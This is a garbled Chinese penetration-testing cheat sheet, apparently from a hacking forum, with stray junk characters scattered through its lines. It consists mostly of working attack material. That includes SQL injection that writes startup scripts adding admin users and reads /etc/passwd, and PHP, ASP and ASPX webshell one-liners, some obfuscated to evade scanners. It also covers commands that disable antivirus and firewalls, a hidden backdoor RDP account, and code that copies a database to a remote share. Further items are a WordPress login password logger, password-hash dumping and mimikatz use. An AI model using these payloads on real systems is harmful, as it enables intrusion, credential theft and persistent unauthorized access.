insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );' A8 ^, S' _3 s* N9 v
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";7 H Y' N. C6 X/ S( _
drop table a;
" A9 g2 b& e8 T5 c2 X: z1 }* P) [' x4 h1 E9 I% j% x( U
英文版本:
$ A5 d* @7 _% _, `" A( \7 a# P( F2 G4 z$ u4 O2 R* e% \0 |
use test;
/ u6 C4 Y5 U, B; I: }- Vcreate table a (cmd text);+ S+ S& c0 w8 Y2 r* D1 j
insert into a values ("set wshshell=createobject (""wscript.shell"") " );: F2 k5 Z4 n, i
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
r3 I% i; I* h7 K2 J+ j; finsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );- K6 _# t- H5 e0 L
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' w% G* o1 C0 Vdrop table a;
5 W) V/ n2 j) l4 c! E* P+ o
* \& Q5 V8 b+ u" Xcreate table a (cmd BLOB);& ]% E2 r8 u8 @8 [+ |/ w) X$ K" b
insert into a values (CONVERT(木马的16进制代码,CHAR));
?2 ^4 t( p$ l: O4 Qselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
N% {4 h# n( n1 U3 \drop table a;
' X4 I4 Z6 m' C" ?8 ?: P. v% H7 S' n
记录一下怎么处理变态诺顿: F; y/ q6 u0 n" j! _* h+ K/ M9 @+ ^
查看诺顿服务的路径! a \. W) |- b% z. A
sc qc ccSetMgr5 K( }8 W5 c. y' k; P, }
然后设置权限拒绝访问。做绝一点。。
7 N4 Q/ y% s( m* T0 j1 F, gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
7 Z# ?& ^8 |8 K- v' k8 \8 L) Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"% Y! ~- \0 o9 z3 u3 U# M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
# L4 `* c: g- [ N. ]0 r8 zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
4 _* G6 Q# w2 g2 u2 v% A# L) _, P8 t X/ i
然后再重启服务器( v2 T- g' K2 i9 B1 Y1 E; H
iisreset /reboot: r! I ]6 O3 Z
这样就搞定了。。不过完事后。记得恢复权限。。。。7 l5 M6 L5 }0 [6 G' [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F7 q2 f2 b" |1 }! k. k4 I0 ^
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
& U$ Z7 A9 \' j m @- u0 ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F: Y8 ? |, h. ?, F6 Z' n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F: Q8 g% X/ [" \
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
8 [6 N7 `9 z* w! T3 G% v+ b; [" y- G4 A% \' {
" g Q3 A9 }0 c( C% @$ }9 N: a. ]EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
1 d# A! D: P* o- `- D) R, Y
% p$ _9 r" r4 H6 J5 [5 h; X4 n8 O: lpostgresql注射的一些东西( i) i+ m" [0 q% J' [3 z8 {0 T
如何获得webshell
+ k5 J m( ~+ Y* F( l% Bhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
' i {# _& p9 B& H6 B0 bhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
+ z2 r. L$ W; Ohttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;0 C7 G; q8 v, V- M4 y3 z1 J
如何读文件
' w% M" { Q& Z& y, ^http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);# h8 x) ]/ K4 j) [* a! E
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;0 x$ n" i- Q6 m5 E' d/ E1 v7 B
http://127.0.0.1/postgresql.php?id=1;select * from myfile;0 u, @4 m2 g4 ~; k% `
) y. _& c, U9 B) X# ]' v
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。& l/ N0 s9 D: _: Q
当然,这些的postgresql的数据库版本必须大于8.X
1 s. J: B2 d) v# p5 e创建一个system的函数:/ X6 H% r9 N9 F0 ^" R. @
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
# K# L S) p6 k" o
/ `' N# D; [. H' p q创建一个输出表:
" j9 O3 B5 I" u9 E9 cCREATE TABLE stdout(id serial, system_out text)
5 p$ g- G0 X/ z# E, O3 `! T
6 Q6 L4 o8 ?- O5 X% f( ~执行shell,输出到输出表内:
; ~* W9 a& n4 p0 ^! X1 h& B& oSELECT system('uname -a > /tmp/test')
8 a2 X' v/ _# E/ M
& W* m0 P# s% A0 hcopy 输出的内容到表里面;/ X* y" |! l4 w) j
COPY stdout(system_out) FROM '/tmp/test'& m J- \9 R* F2 R; ^3 E% I. N
; I- `. \, k, N* k- S7 _4 m/ _7 c从输出表内读取执行后的回显,判断是否执行成功
6 k1 ]8 |- \! q1 A
# i, S' N' _& q0 x8 P( J$ cSELECT system_out FROM stdout2 k8 {: H" t( V4 R
下面是测试例子
: M& v7 O8 B* K1 C: W G7 ^: o) j O
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ; I4 {3 d' z8 m3 m" g
. g) t9 T- h S& J
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 j4 w" C" P! e- M
STRICT --) z% F3 b2 C- _2 ?+ x. l$ H# B
: k+ f9 X+ v5 @& |0 c& g; r
/store.php?id=1; SELECT system('uname -a > /tmp/test') --: s; u* p: l6 m
% @8 } u6 t) @+ b/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
9 z& s2 z' k' ^' a1 q
# k/ z* V3 V. N( f0 w' G/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
+ _3 X- Y3 q" d; a6 B" Snet stop sharedaccess stop the default firewall$ X% S3 G( f8 g: y0 M# c2 @* r
netsh firewall show show/config default firewall
. M) `6 l! p* F8 t6 i6 @netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
$ a! p. v# z" [, W) onetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall5 ^2 Z& z: [# `( V9 @
修改3389端口方法(修改后不易被扫出) G' o# U6 Q. ~8 w, w5 P% a- `0 ~
修改服务器端的端口设置,注册表有2个地方需要修改
8 d z" M/ r3 r
" f3 E0 L& s3 o W[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp], e* d6 E! X1 x, [6 C/ T3 _
PortNumber值,默认是3389,修改成所希望的端口,比如6000
/ {, x9 \: e+ p c5 ], [: B# s) K& C* B5 l% y
第二个地方:* E5 Y6 @5 p" D* Y0 S
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
6 g) N# X7 y% [( B" q. c. h6 d' z0 J- CPortNumber值,默认是3389,修改成所希望的端口,比如60002 w) T; c2 S# M7 B
4 p+ m7 F3 O: y7 q现在这样就可以了。重启系统就可以了8 C- L% r; P: b1 Y0 _
1 L' w4 m1 V3 y% X查看3389远程登录的脚本
( K9 M( y7 }7 P3 p- f保存为一个bat文件: W* M/ }7 w9 Y/ g" q$ v( B0 z( z
date /t >>D:\sec\TSlog\ts.log
3 f8 [# ?( B f( ?0 H8 u5 j% x8 Qtime /t >>D:\sec\TSlog\ts.log
, w1 v3 ?9 d# i, nnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log2 F5 u) Y& D) k0 X! T6 H
start Explorer
7 u; j) ]; D: o( B. _* z0 ?7 j2 s0 t4 e0 }* T( \
mstsc的参数:" ?# S5 R; H$ e2 G- q8 b
' [4 P' z, z w! ?& B5 f
远程桌面连接
$ x0 ?; ?5 Y: }' q4 x% n' e
$ i1 W* a' j* S+ A' rMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]# n, e4 H. J. l" T$ b% F
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
5 M2 i6 z- Z" ?2 @ E: r* h) y( u! h* I4 r
<Connection File> -- 指定连接的 .rdp 文件的名称。0 Z- ]# u* Y- q# X6 v
2 m5 `3 H1 i$ |3 z. w: N/v:<server[:port]> -- 指定要连接到的终端服务器。 E+ q( A6 N( [
. l, q+ K* O8 v! h5 y& q) L5 C; L
/console -- 连接到服务器的控制台会话。 y, y$ e+ u0 q
4 ~& J( X9 ?# G* A
/f -- 以全屏模式启动客户端。
- W4 ~+ M, K9 @2 h7 J* I% d
% Q- _' `/ P' W* _/w:<width> -- 指定远程桌面屏幕的宽度。
) \. |. c3 q2 ~
$ U5 T( E7 y8 o+ b7 C/h:<height> -- 指定远程桌面屏幕的高度。4 z9 _6 w7 \- \4 k3 k
9 I4 y; f- d8 E- O- t/edit -- 打开指定的 .rdp 文件来编辑。
6 p N8 I: ? n
- i+ {( j! |/ z; F1 k0 {1 q/ }" x/migrate -- 将客户端连接管理器创建的旧版" k" R/ J @- C( ^
连接文件迁移到新的 .rdp 连接文件。) ]* G. i$ }/ K
+ g/ X& ]8 ~. g7 g- Q' R
5 H6 g- t+ v( D$ f3 n: X4 G
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
. B4 z+ Z* m; Umstsc /console /v:124.42.126.xxx 突破终端访问限制数量
2 {2 s: @$ Z/ c( Y7 ?# ~8 j( X4 K% ]: o% r: ^
命令行下开启33891 @6 W* P1 _; Q$ F
net user asp.net aspnet /add+ }9 j- [% O! [! ?
net localgroup Administrators asp.net /add V7 |- z1 ]! {" M
net localgroup "Remote Desktop Users" asp.net /add# L* d4 C9 l' Z: L5 X- d7 q
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
# R& ?8 l+ l$ d% q D& c! Pecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
# Y. E2 b) N) A1 n, L q0 s- }echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
* L0 P/ f: Z, V* u) yecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f4 g5 a+ \* s. x: K1 H5 y
sc config rasman start= auto$ | C" B( K3 S* d& T ^' c
sc config remoteaccess start= auto
+ e& H% H+ P7 T( |& wnet start rasman; s+ w& H1 b) q) @
net start remoteaccess
, h- u$ M; n% Y- @( ] d' p; HMedia
$ p& x& G8 g# s/ V8 }4 O R<form id="frmUpload" enctype="multipart/form-data"
( e0 z8 ~4 x) q, uaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
* P1 O: S6 |5 x9 J$ b<input type="file" name="NewFile" size="50"><br>
3 g, @8 r( r" `' n$ `% S<input id="btnUpload" type="submit" value="Upload">; ]; n2 N3 z; r8 W
</form>+ F7 ?: { C4 X/ b
\5 S- G$ ^5 [+ m: R; s! `6 v- K
control userpasswords2 查看用户的密码
* k% S4 \( e: Naccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径 h. X7 ~. t# q; K4 G- m) d
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 c9 D( H, L$ u; j! S& j, c6 X4 W3 Y' f7 j, Y" _, V q
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
- f& h6 ]/ r1 K测试1:
5 s+ H+ ]6 b; L$ N+ jSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t18 B: [4 U1 s+ X" }/ s5 g
$ a! y3 d2 S4 d2 c5 @. G测试2:
6 w1 {4 A$ b8 z+ t9 v( c2 N3 e2 r9 K& J
create table dirs(paths varchar(100),paths1 varchar(100), id int)
3 j+ ~3 W- u6 ]9 T$ @( U6 @( m. L- J9 t6 c$ w+ D4 c2 u6 `) M
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
( t8 Y% K3 T6 [* W. P1 J+ s; O# U
5 r- {4 g9 u7 YSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( f4 o( \0 y5 `/ z; H关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
/ ~: G- Q. i0 i# ?# f" x z可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;$ ~' s V6 l5 Q* l4 a D6 |
net stop mcafeeframework
+ Y! x. ]/ X* Z. k! Z" C+ X7 Q+ mnet stop mcshield
2 f- V& {% R' P$ o% x- a2 gnet stop mcafeeengineservice
6 U0 v( T1 e6 s5 Z0 v, |3 u7 [net stop mctaskmanager
7 R! b. A# W7 ?8 z; ~! X- D: Whttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D1 T% d' \, @0 j
+ n/ k$ o. R/ q! I- q2 [ VNCDump.zip (4.76 KB, 下载次数: 1) 4 s6 l7 S: ~7 k' h0 e, ^
密码在线破解http://tools88.com/safe/vnc.php
0 b% \% H/ w5 f1 {VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取2 Y! e2 Z2 I( n8 D# u3 U$ E4 n: v
6 L! X+ s4 l7 P3 F ]! ]' ~
exec master..xp_cmdshell 'net user'
! v' \- ]. D" c+ ?mssql执行命令。- I4 _( H; Z5 x# _7 \+ z; d- V" d$ H
获取mssql的密码hash查询
% t3 B; q( c* m/ f. x# {select name,password from master.dbo.sysxlogins$ _9 |2 W8 j& l# j3 C3 c- {9 B, n
: N% m& k# p4 M+ mbackup log dbName with NO_LOG;2 @* N! k% Q6 f
backup log dbName with TRUNCATE_ONLY;
# a- s- `9 O- p0 B& W" n. qDBCC SHRINKDATABASE(dbName);
. u' U! k2 H/ Q# Kmssql数据库压缩2 I- S; j$ _1 g$ d; x' X5 r! Z1 H
) [# }7 @5 o- h, i/ Z# p
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
2 d, y/ l- ?" K! u: b A将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。. z7 C" X# {* Z5 ?) @
& |3 O% X$ F4 kbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'* j. r! _# s" k
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak) j9 p, J" o" [1 X: r. i8 m
" c0 i7 P( @: t7 l7 p7 j3 WDiscuz!nt35渗透要点:
4 W9 \# L; u% E" }! _(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default1 }/ V- o6 B6 D9 n1 x
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>- }; g( O, k% i3 [ O! Y' X
(3)保存。
: d0 B! q! L0 w& P(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass8 S. F; W9 h6 E# h1 {, f0 ~
d:\rar.exe a -r d:\1.rar d:\website\
) E- P9 m: K. R; `9 i: h递归压缩website
4 ?, }: r7 s$ e: _' M* j5 e, ]注意rar.exe的路径: H9 f3 p2 x4 G3 q, ]
: c3 k7 I- @) B$ R$ S<?php8 F9 g0 Q9 V* ^6 o3 Q$ H
$ h! H* R4 I. o
$telok = "0${@eval($_POST[xxoo])}";6 Y5 }2 w2 C3 g( l: c# F R( x
! v# ^3 |6 {* I7 l
$username = "123456";
, w2 _+ F! m' a- Y
( K7 p( M/ o' H) w; r$userpwd = "123456";; N; s" s U3 L) [
/ H; l- e) v/ c1 }* U) _- M
$telhao = "123456";
3 w( {4 @7 ~* g1 ~4 l, g g0 d3 o4 }) c6 B* ^- Z! ~) Q
$telinfo = "123456";
. L$ }3 }/ B" L6 g5 h! Z6 B3 ~( o& J2 o! i- I. ^9 [) w6 y
?>; e1 S) d5 G8 X: K$ e8 k8 R! ^
php一句话未过滤插入一句话木马9 }% n- D+ \+ [8 r- H+ Y0 w! ~ g; B
# t7 V, ^' S- A7 |& b" ~! X
站库分离脱裤技巧
; b( n3 Y3 m3 K b0 Xexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
4 ~+ k0 \$ y+ a& G3 ^exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# T$ t0 X: }8 h6 n+ f. n( L条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。) v1 a+ F8 r7 J! Y# Y3 r; i
这儿利用的是马儿的专家模式(自己写代码)。
( Q# I9 j2 w7 o% o9 w0 ^ini_set('display_errors', 1);
4 m: \1 b: L; c/ Q- pset_time_limit(0);9 C$ {2 }+ k; q5 _1 {1 m
error_reporting(E_ALL);
4 b( ]9 q3 o' m. V$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
% _0 o a1 l% ^# {! Pmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
9 C2 F$ f* w% {- d! `- V$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
3 i4 G& e* z" e* l7 h; k# m$i = 0;/ I& }4 T ~; T9 `' H
$tmp = '';
) ~: Z1 G6 p# V0 W- ]while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
# M- m, v9 K% g j $i = $i+1;
] c! a3 p4 }2 t" p. { $tmp .= implode("::", $row)."\n";
( j% S2 @; l7 t+ }" v if(!($i%500)){//500条写入一个文件
# p! ^- ^/ F% C! \0 r( k- w @6 @ $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
! l$ Y% @ |* A/ }- t( i* E file_put_contents($filename,$tmp);
" o( k9 b% q$ N2 x $tmp = '';
! W$ _* l7 ~: Y& [; t: _( B }
3 H% }9 F p* D6 F0 p9 i}
/ r. L5 L. F0 L0 l- ^1 O/ dmysql_free_result($result);
+ A+ ^. c0 Q6 p% T
+ k& L: _! Y) u5 X5 [
+ G" d4 j4 H3 }4 P# y: G
, z* y& K% V7 s7 d6 z' B//down完后delete
7 K \2 r1 Q; p9 C
" L- W( H' X7 @% t% y0 T
) }4 Y% r$ M K8 Uini_set('display_errors', 1);# C2 [5 C5 O- X& g; x
error_reporting(E_ALL);( J* u) E" n7 B- H) D
$i = 0;
1 x. @6 x0 s0 H) G/ Qwhile($i<32) {
5 ?& o9 }8 q" O $i = $i+1;
! l2 r4 Z0 ~6 q; z* J $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';, w4 E) ] h6 m9 {9 Z
unlink($filename);
) I8 T' X; g" i4 z* x3 C8 `} # N% |! T9 i. M2 A" t# ]6 {$ K
httprint 收集操作系统指纹( @( \' Y. ]$ t! G! V. u X
扫描192.168.1.100的所有端口& @4 w' {) v2 S' e! }
nmap –PN –sT –sV –p0-65535 192.168.1.100
8 r4 P* F4 Q% E, S: A! S5 _host -t ns www.owasp.org 识别的名称服务器,获取dns信息/ t0 Y8 t' }# g5 P4 t) e
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输# T8 h& Z; [5 v O8 }
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host5 o _) c. C. p& R' x' t
7 U! C' P" s1 A) kDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 D4 C* E3 Y* V/ F
5 W& R+ R t2 D8 c MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)/ ?! w+ Q1 f; {$ I5 r" s) M
$ D; ~0 Y4 {8 V; i6 N) ?
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
& \0 d# S3 _& p2 _! z- N+ _5 Y- d! R4 [# `9 f. J
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用), S$ k6 \, d C, S8 T' W7 y8 a
' h) ?) L' ?! m' q3 P7 W I
http://net-square.com/msnpawn/index.shtml (要求安装)
& X9 L/ H: ~" p; `, R
$ q% f4 ?: l" t tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
" b0 S9 Z r0 j K9 R4 I
% e% k7 j( g+ @- r SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)7 ^: ?+ i* Y( H/ K. j) i
set names gb23122 R7 O& m# l8 N/ N: a% Q3 `( [* }
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。' E" [7 z, F; Q
/ y& ^% J; n+ D" |5 v5 @
mysql 密码修改& x" g6 J+ Z# n1 m7 k
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
W) I- h' g& h8 m% o: O2 zupdate user set password=PASSWORD('antian365.com') where user='root';0 g! J# \$ L2 o* ]
flush privileges;/ |9 M, e. t3 `/ l7 X- E( t- F
高级的PHP一句话木马后门3 U/ I& F0 Z1 i
B+ H. D* ~: u* r) J
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
& ~0 M3 d! c+ W& ]. H8 p
/ x) J' R& W# L; H( O7 F4 ?2 k1 S1、" e( K% c) W8 j( q4 m# h
. s2 j1 U4 H& T7 d5 f$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";7 y9 w" k* O! U1 g4 D1 V, @
3 r; v: S. u) g, _: h' w' k
$hh("/[discuz]/e",$_POST['h'],"Access");
y* ?' ]' _5 @. o0 [, |/ U* X' k) ~' j# e( V
//菜刀一句话
5 r- i1 U* u \( }. H2 {! A# U* d. t! o# n1 n" K
2、1 ]1 G% ~! m( C
0 g9 v0 ^0 D( d+ r$filename=$_GET['xbid'];
5 x+ P! j4 s' X# |& u+ k
; P% }. J9 T0 v+ c$ b/ Y' ^6 j) yinclude ($filename);! }/ X( Z6 F! y8 k" W
: p! \! t: `" c: t/ p//危险的include函数,直接编译任何文件为php格式运行
. C: y: Q: @; {+ ^/ m; G
- C; a. k3 D$ H h5 E; x7 @3、
4 M4 E0 v8 |4 N4 Y9 @4 |8 M9 C6 R$ V, w0 \8 N
$reg="c"."o"."p"."y";' s% x) ~& ~: A u5 w
9 |* w3 j$ B* K9 u1 N; o: j7 i2 {$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
. z3 e( j0 n- O0 n K: O4 [* L" p" `/ K. g: r; v
//重命名任何文件0 e! T T4 M' ^5 t' i. C1 |' E
3 T3 ]+ i% F: P" f& q7 v
4、1 G/ l' Z4 J$ H* h
/ R1 @" O7 Q* O( ]0 B( y$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 k3 j2 ^6 L( y5 c0 A \. l6 m
- r0 _# U+ S4 F0 |1 B, o3 t
$gzid("/[discuz]/e",$_POST['h'],"Access");* K6 @' m. o4 D% d5 V% s$ L) O u
2 N& D; N* K8 B6 {
//菜刀一句话4 |) V- o( ^1 }7 F# c8 V% h
, v9 v. ^' ~+ ]7 X) `
5、include ($uid);
6 c t2 r7 k8 c% ^: H7 c A4 p- A1 t' z1 I
//危险的include函数,直接编译任何文件为php格式运行,POST
% e1 p6 U' F1 @2 `2 s2 Q: B) O$ m" |2 B4 Y: j8 J7 L/ U
; Z' _- ^% C# e- L5 w: c$ e//gif插一句话5 q) c) j! I- Q9 T
! G1 I* \+ P& H2 C O; s5 J6、典型一句话
' M6 s2 n. \2 s& `) n
; l* i9 \- U4 x+ e' Y# _! [程序后门代码& Z6 c; A5 b. _6 M& U
<?php eval_r($_POST[sb])?>. T# o! X5 _7 p. M4 x1 ?% d4 ^ j+ e; W
程序代码
- I$ y* D3 h9 S/ N/ u<?php @eval_r($_POST[sb])?>+ B5 \: Y* N, E+ N* \
//容错代码# l9 ]: p( j6 j1 c& \
程序代码
" E4 K# { j& O0 ^* m2 F<?php assert($_POST[sb]);?>
! p( f3 C) F/ ]* p//使用lanker一句话客户端的专家模式执行相关的php语句
5 X2 W. q0 J/ [+ G; S8 h' U程序代码
) S/ n0 {8 t8 _& e: ~<?$_POST['sa']($_POST['sb']);?>
, P0 K2 Z8 }0 o8 U6 }* m) u程序代码
, s5 w }& B+ H: W1 O/ S' e) ~5 k<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>! @0 Q$ j9 ]) U5 n: X
程序代码
3 ]- b, U4 n0 u0 z1 Y<?php
/ M0 v3 ]4 }6 S. l- b/ s, a@preg_replace("/[email]/e",$_POST['h'],"error");
# n! {, ?# j9 R0 S% ]; {?>" _$ H S9 ?6 r
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入6 v, y5 a$ r; p+ F
程序代码- G. U& X" C% ]/ R
<O>h=@eval_r($_POST[c]);</O>; {) ?+ s" T) p6 D5 d! ]
程序代码1 v. K. X/ c4 f+ A" a. a& I" b
<script language="php">@eval_r($_POST[sb])</script>
' }+ a, m, d+ }- b/ z) b4 b( G//绕过<?限制的一句话
- y2 Y9 v$ N$ T, d" R6 }& L/ \& N# g% I I' D$ [, T" c
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
9 {6 U% k) G% Y4 |" l, M, O详细用法:! N4 x: W$ ]; q- e1 Z7 q9 g5 }
1、到tools目录。psexec \\127.0.0.1 cmd( C9 H$ `: S$ i- l
2、执行mimikatz
" K6 q% U7 [) N3、执行 privilege::debug
4 }7 o0 ~- f0 K( {2 o$ C4、执行 inject::process lsass.exe sekurlsa.dll0 A! u9 k& _( n
5、执行@getLogonPasswords0 ~) T {( B R3 |, w
6、widget就是密码* |2 j. P3 g$ F4 {5 d) c
7、exit退出,不要直接关闭否则系统会崩溃。
! O k, A j1 \& l
$ G( D3 z+ l+ O: P+ ]$ Bhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面6 ^5 F: g# U% @
& w% `# s9 D' K5 p6 U# ~" o自动查找系统高危补丁
6 j7 \, k4 i& G" dsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
; L' r( [7 t. h# T
2 ?5 w* Q/ S) O$ I2 ~突破安全狗的一句话aspx后门8 l" |$ Q) B& A" K5 L l
<%@ Page Language="C#" ValidateRequest="false" %>
* \6 ^4 L7 v6 z4 [7 ]7 g l<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
q# ^# m7 l: u: [. T9 owebshell下记录WordPress登陆密码
. ^0 T9 W9 I6 P, m; O1 |4 Awebshell下记录Wordpress登陆密码方便进一步社工# F# {$ w& ~$ U3 }3 p2 t
在文件wp-login.php中539行处添加:
$ r: a4 q0 \- s1 [& t# j5 n1 R// log password
& F- |+ v/ y, n6 v3 {. D$log_user=$_POST['log'];
, U/ T8 A; X; W' N( I" u$log_pwd=$_POST['pwd'];
; G0 \, d0 N+ {8 p$log_ip=$_SERVER["REMOTE_ADDR"];/ B9 S9 B; G( s3 _' t
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
: n6 q& p' P6 G( C$txt=$txt.”\r\n”;
- I! Q; S- P, {1 iif($log_user&&$log_pwd&&$log_ip){" U, `" ~7 x9 O+ t; c; U8 O5 A
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
+ L; D2 L; l: L! n% q}/ v' J' Z" X1 J5 T' f( F' y; f
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
4 m. N( [- m* a: J% Q9 C就是搜索case ‘login’$ [% m2 S( J& u6 J8 O( M1 }9 X
在它下面直接插入即可,记录的密码生成在pwd.txt中,! L! d, a2 ?* j) X8 I4 w4 \
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录3 w" N% W# x6 Z) w6 Y2 ~: t
利用II6文件解析漏洞绕过安全狗代码:' b# G4 j& a0 x, ^. a7 G
;antian365.asp;antian365.jpg
) ]: L: L+ F8 L: G# `6 b3 }$ t X" i# X# K! v, S; |" B# F
各种类型数据库抓HASH破解最高权限密码!" m4 ^; L3 Y+ n" N6 D% ?; ?
1.sql server2000# g5 }: K- I& a& X' K$ F
SELECT password from master.dbo.sysxlogins where name='sa'
